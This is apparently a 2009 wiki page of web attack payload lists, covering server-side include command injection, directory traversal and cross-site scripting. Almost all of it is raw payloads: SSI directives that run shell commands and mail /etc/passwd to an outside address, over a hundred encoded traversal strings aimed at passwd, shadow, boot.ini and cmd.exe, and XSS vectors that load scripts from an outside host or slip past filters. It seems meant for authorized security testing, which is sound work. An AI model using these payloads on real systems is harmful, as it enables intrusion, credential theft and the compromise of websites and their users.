=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;amp;lt;mailto:Foobar@email.de&amp;amp;gt; &amp;amp;lt; cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
